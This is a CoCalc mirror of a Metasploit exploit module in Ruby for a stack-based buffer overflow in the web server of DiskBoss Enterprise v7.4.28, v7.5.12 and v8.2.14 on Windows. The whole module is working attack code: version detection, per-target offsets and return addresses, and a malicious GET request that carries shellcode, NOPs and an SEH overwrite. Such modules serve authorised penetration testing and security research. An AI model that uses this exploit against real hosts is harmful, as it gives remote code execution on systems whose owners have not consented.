CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Seh9include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(update_info(info,13'Name' => 'DiskBoss Enterprise GET Buffer Overflow',14'Description' => %q{15This module exploits a stack-based buffer overflow vulnerability16in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,17caused by improper bounds checking of the request path in HTTP GET18requests sent to the built-in web server. This module has been19tested successfully on Windows XP SP3 and Windows 7 SP1.20},21'License' => MSF_LICENSE,22'Author' =>23[24'vportal', # Vulnerability discovery and PoC25'Ahmad Mahfouz', # Vulnerability discovery and PoC26'Gabor Seljan', # Metasploit module27'Jacob Robles' # Metasploit module28],29'References' =>30[31['EDB', '40869'],32['EDB', '42395']33],34'DefaultOptions' =>35{36'EXITFUNC' => 'thread'37},38'Platform' => 'win',39'Payload' =>40{41'BadChars' => "\x00\x09\x0a\x0d\x20",42'Space' => 200043},44'Targets' =>45[46[47'Automatic Targeting',48{49'auto' => true50}51],52[53'DiskBoss Enterprise v7.4.28',54{55'Offset' => 2471,56'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]57}58],59[60'DiskBoss Enterprise v7.5.12',61{62'Offset' => 2471,63'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]64}65],66[67'DiskBoss Enterprise v8.2.14',68{69'Offset' => 2496,70'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]71}72]73],74'Privileged' => true,75'DisclosureDate' => '2016-12-05',76'DefaultTarget' => 0))77end7879def check80res = send_request_cgi(81'method' => 'GET',82'uri' => '/'83)8485if res && res.code == 20086if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/87return Exploit::CheckCode::Vulnerable88elsif res.body =~ /DiskBoss Enterprise/89return Exploit::CheckCode::Detected90end91else92vprint_error('Unable to determine due to a HTTP connection timeout')93return Exploit::CheckCode::Unknown94end9596Exploit::CheckCode::Safe97end9899def exploit100mytarget = target101102if target['auto']103mytarget = nil104105print_status('Automatically detecting the target...')106107res = send_request_cgi(108'method' => 'GET',109'uri' => '/'110)111112if res && res.code == 200113if res.body =~ /DiskBoss Enterprise v7\.4\.28/114mytarget = targets[1]115elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/116mytarget = targets[2]117elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/118mytarget = targets[3]119end120end121122if !mytarget123fail_with(Failure::NoTarget, 'No matching target')124end125126print_status("Selected Target: #{mytarget.name}")127end128129case mytarget130when targets[1], targets[2]131sploit = make_nops(21)132sploit << payload.encoded133sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)134sploit << [mytarget.ret].pack('V')135sploit << rand_text_alpha(2500)136when targets[3]137seh = generate_seh_record(mytarget.ret)138sploit = payload.encoded139sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)140sploit[sploit.length, seh.length] = seh141sploit << make_nops(10)142sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode143sploit << rand_text_alpha(5000 - sploit.length)144else145fail_with(Failure::NoTarget, 'No matching target')146end147148send_request_cgi(149'method' => 'GET',150'uri' => sploit151)152end153end154155156